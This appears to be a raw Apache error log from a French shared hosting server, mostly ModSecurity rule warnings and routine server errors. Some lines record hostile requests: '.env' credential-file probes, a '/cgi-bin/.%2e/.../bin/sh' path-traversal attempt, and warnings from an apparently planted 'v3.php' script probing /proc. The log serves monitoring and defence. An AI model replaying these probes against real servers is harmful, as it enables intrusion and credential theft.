[Tue May 12 00:43:03.254740 2026] [security2:error] [pid 1630927:tid 1630954] [client 176.65.139.238:47576] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agJbdGiGYYhUwDaJINm9vgAAAVg"]
[Tue May 12 00:43:17.167313 2026] [autoindex:error] [pid 1691274:tid 1691288] [client 31.58.24.104:40587] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: https://www.google.com/
[Tue May 12 00:43:17.704195 2026] [autoindex:error] [pid 1691274:tid 1691288] [client 31.58.24.104:40587] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: https://www.google.com/
[Tue May 12 00:43:18.741308 2026] [autoindex:error] [pid 1691274:tid 1691288] [client 31.58.24.104:40587] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: https://www.google.com/
[Tue May 12 00:43:20.787461 2026] [proxy_fcgi:error] [pid 1691274:tid 1691294] [client 4.193.137.131:20288] AH01071: Got error 'Primary script unknown'
[Tue May 12 00:43:29.182187 2026] [security2:error] [pid 1605480:tid 1605534] [client 129.226.95.137:42454] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "k06.fr"] [uri "/"] [unique_id "agJbkR2Cvzd_nyNfUm8viQAAAQw"]
[Tue May 12 00:43:41.761132 2026] [autoindex:error] [pid 1691274:tid 1691285] [client 31.58.9.225:54263] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: https://www.google.com/
[Tue May 12 00:43:42.329647 2026] [autoindex:error] [pid 1691274:tid 1691285] [client 31.58.9.225:54263] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: https://www.google.com/
[Tue May 12 00:43:43.404381 2026] [autoindex:error] [pid 1691274:tid 1691285] [client 31.58.9.225:54263] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: https://www.google.com/
[Tue May 12 00:43:48.313177 2026] [security2:error] [pid 1630927:tid 1630933] [client 176.65.139.236:43752] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "apoe.fr"] [uri "/app/.env"] [unique_id "agJbpGiGYYhUwDaJINm-MgAAAUM"]
[Tue May 12 00:43:48.313391 2026] [security2:error] [pid 1630927:tid 1630933] [client 176.65.139.236:43752] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "apoe.fr"] [uri "/app/.env"] [unique_id "agJbpGiGYYhUwDaJINm-MgAAAUM"]
[Tue May 12 00:43:48.313928 2026] [security2:error] [pid 1630927:tid 1630933] [client 176.65.139.236:43752] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "apoe.fr"] [uri "/app/.env"] [unique_id "agJbpGiGYYhUwDaJINm-MgAAAUM"]
[Tue May 12 00:44:08.472466 2026] [autoindex:error] [pid 1630927:tid 1630932] [client 31.56.138.23:40773] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: https://www.google.com/
[Tue May 12 00:44:09.015618 2026] [autoindex:error] [pid 1630927:tid 1630932] [client 31.56.138.23:40773] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: https://www.google.com/
[Tue May 12 00:44:10.075308 2026] [autoindex:error] [pid 1630927:tid 1630932] [client 31.56.138.23:40773] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: https://www.google.com/
[Tue May 12 00:44:30.871265 2026] [security2:error] [pid 1605480:tid 1605530] [client 43.134.40.189:59798] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/wp-admin/admin-ajax.php"] [unique_id "agJbzh2Cvzd_nyNfUm8v_QAAAQg"]
[Tue May 12 00:44:35.071249 2026] [security2:error] [pid 1606352:tid 1606419] [client 43.159.58.77:40700] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecf.com"] [uri "/"] [unique_id "agJb03o_DFxNSZVmaX3_-AAAAMA"]
[Tue May 12 00:44:39.005060 2026] [security2:error] [pid 1630927:tid 1630947] [client 43.159.58.77:59450] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecf.com"] [uri "/"] [unique_id "agJb12iGYYhUwDaJINm-rQAAAVE"], referer: http://www.castiglionecf.com
[Tue May 12 00:44:44.619129 2026] [security2:error] [pid 1606352:tid 1606434] [client 43.159.58.77:37758] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agJb3Ho_DFxNSZVmaX0ACgAAAM8"], referer: https://www.castiglionecf.com/
[Tue May 12 00:44:47.585794 2026] [ssl:error] [pid 1606352:tid 1606437] (EAI 2)Name or service not known: [client 51.68.111.217:25411] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 00:44:47.586180 2026] [ssl:error] [pid 1606352:tid 1606437] AH01941: stapling_renew_response: responder error
[Tue May 12 00:45:05.290998 2026] [security2:error] [pid 1691274:tid 1691288] [client 43.157.38.228:38218] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "apoe.fr"] [uri "/downloads/APOE-Convocation_AG-2021.pdf"] [unique_id "agJb8VfdQaraX_prmqf3nwAAAAs"]
[Tue May 12 00:45:29.061178 2026] [security2:error] [pid 1601130:tid 1601169] [client 43.165.195.234:38460] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/xmlrpc.php"] [unique_id "agJcCXEgAO_835W6c1nHxQAAAFM"]
PHP Fatal error:  Allowed memory size of 134217728 bytes exhausted (tried to allocate 36864 bytes) in Unknown on line 0
PHP Warning:  filesize(): stat failed for /usr/share/doc/hunspell/README in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /usr/share/doc/hunspell/README in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 00:46:18.294054 2026] [security2:error] [pid 1691274:tid 1691292] [client 129.226.174.80:47214] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/wp-content/uploads/2020/05/304-Coup"] [unique_id "agJcOlfdQaraX_prmqf4FAAAABA"]
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704679/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704679/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704679/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704679/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704679/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704679/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 00:46:37.834245 2026] [security2:error] [pid 1601130:tid 1601173] [client 43.153.26.165:40096] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agJcTXEgAO_835W6c1nIEgAAAFc"]
[Tue May 12 00:46:39.254129 2026] [security2:error] [pid 1606352:tid 1606434] [client 43.134.236.33:48556] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/on-est-sur-instagram/"] [unique_id "agJcT3o_DFxNSZVmaX0AvAAAAM8"]
[Tue May 12 00:46:43.410258 2026] [ssl:error] [pid 1601130:tid 1601162] (EAI 2)Name or service not known: [client 93.159.230.85:58268] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 00:46:43.411337 2026] [ssl:error] [pid 1601130:tid 1601162] AH01941: stapling_renew_response: responder error
[Tue May 12 00:46:44.661278 2026] [security2:error] [pid 1630927:tid 1630943] [client 43.153.26.165:43426] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/nos-services/cession-reprise-dentreprise-en-difficulte/"] [unique_id "agJcVGiGYYhUwDaJINm_RAAAAU0"], referer: https://www.castiglionecorporatefinance.fr/?p=947
[Tue May 12 00:47:28.777079 2026] [security2:error] [pid 1605480:tid 1605544] [client 43.166.237.57:55418] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "krakoukas.com"] [uri "/category/domotique/home-assistant/"] [unique_id "agJcgB2Cvzd_nyNfUm8w4AAAARY"]
[Tue May 12 00:48:56.177657 2026] [security2:error] [pid 1605480:tid 1605522] [client 43.134.57.179:36822] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/chiens.php"] [unique_id "agJc2B2Cvzd_nyNfUm8x6QAAAQA"]
[Tue May 12 00:48:59.366052 2026] [:error] [pid 1606352:tid 1606427] [client 66.132.195.102:46964] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 00:49:11.581075 2026] [security2:error] [pid 1691274:tid 1691290] [client 129.226.209.117:42966] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/wp-content/uploads/2014/07/cr\\xc3\\xa9ation-dun-restautrant-epicerie-salon-de-th\\xc3\\xa9.pdf"] [unique_id "agJc51fdQaraX_prmqf4zwAAAA0"]
[Tue May 12 00:49:17.071170 2026] [:error] [pid 1691274:tid 1691295] [client 66.132.195.102:26972] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 00:49:37.590388 2026] [core:error] [pid 1601130:tid 1601170] [client 144.91.74.19:45910] AH10244: invalid URI path (/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh)
[Tue May 12 00:49:37.593846 2026] [:error] [pid 1601130:tid 1601170] [client 144.91.74.19:45910] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 00:49:51.293859 2026] [proxy_fcgi:error] [pid 1695975:tid 1695996] [client 74.91.224.220:37250] AH01071: Got error 'Primary script unknown'
[Tue May 12 00:49:53.694260 2026] [proxy_fcgi:error] [pid 1695975:tid 1695982] [client 64.176.9.86:51822] AH01071: Got error 'Primary script unknown'
[Tue May 12 00:50:21.637098 2026] [security2:error] [pid 1601130:tid 1601162] [client 43.163.206.70:52184] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJdLXEgAO_835W6c1nIwwAAAEw"]
[Tue May 12 00:50:23.126603 2026] [security2:error] [pid 1695975:tid 1695980] [client 43.156.44.207:51878] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agJdL9VI9ymHBxup749nDwAAAII"]
PHP Warning:  filesize(): stat failed for /proc/1704253/task/1704266/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704253/task/1704266/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704253/task/1704266/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704253/task/1704266/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704253/task/1704266/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704253/task/1704266/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 00:50:57.780718 2026] [security2:error] [pid 1691274:tid 1691282] [client 43.164.196.47:36366] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/hirondelle/"] [unique_id "agJdUVfdQaraX_prmqf5cgAAAAU"]
[Tue May 12 00:51:09.155512 2026] [autoindex:error] [pid 1606352:tid 1606423] [client 20.9.31.235:39790] AH01276: Cannot serve directory /home/poledemo/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:51:10.173250 2026] [autoindex:error] [pid 1605480:tid 1605535] [client 20.9.31.235:33560] AH01276: Cannot serve directory /home/poledemo/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:52:33.543527 2026] [autoindex:error] [pid 1606352:tid 1606423] [client 20.9.31.235:39790] AH01276: Cannot serve directory /home/poledemo/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:52:34.786635 2026] [autoindex:error] [pid 1605480:tid 1605535] [client 20.9.31.235:33560] AH01276: Cannot serve directory /home/poledemo/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:52:38.666282 2026] [autoindex:error] [pid 1606352:tid 1606423] [client 20.9.31.235:39790] AH01276: Cannot serve directory /home/poledemo/public_html/wp-admin/css/colors/modern/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:52:39.783454 2026] [autoindex:error] [pid 1605480:tid 1605535] [client 20.9.31.235:33560] AH01276: Cannot serve directory /home/poledemo/public_html/wp-admin/css/colors/modern/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:52:41.027877 2026] [autoindex:error] [pid 1606352:tid 1606423] [client 20.9.31.235:39790] AH01276: Cannot serve directory /home/poledemo/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
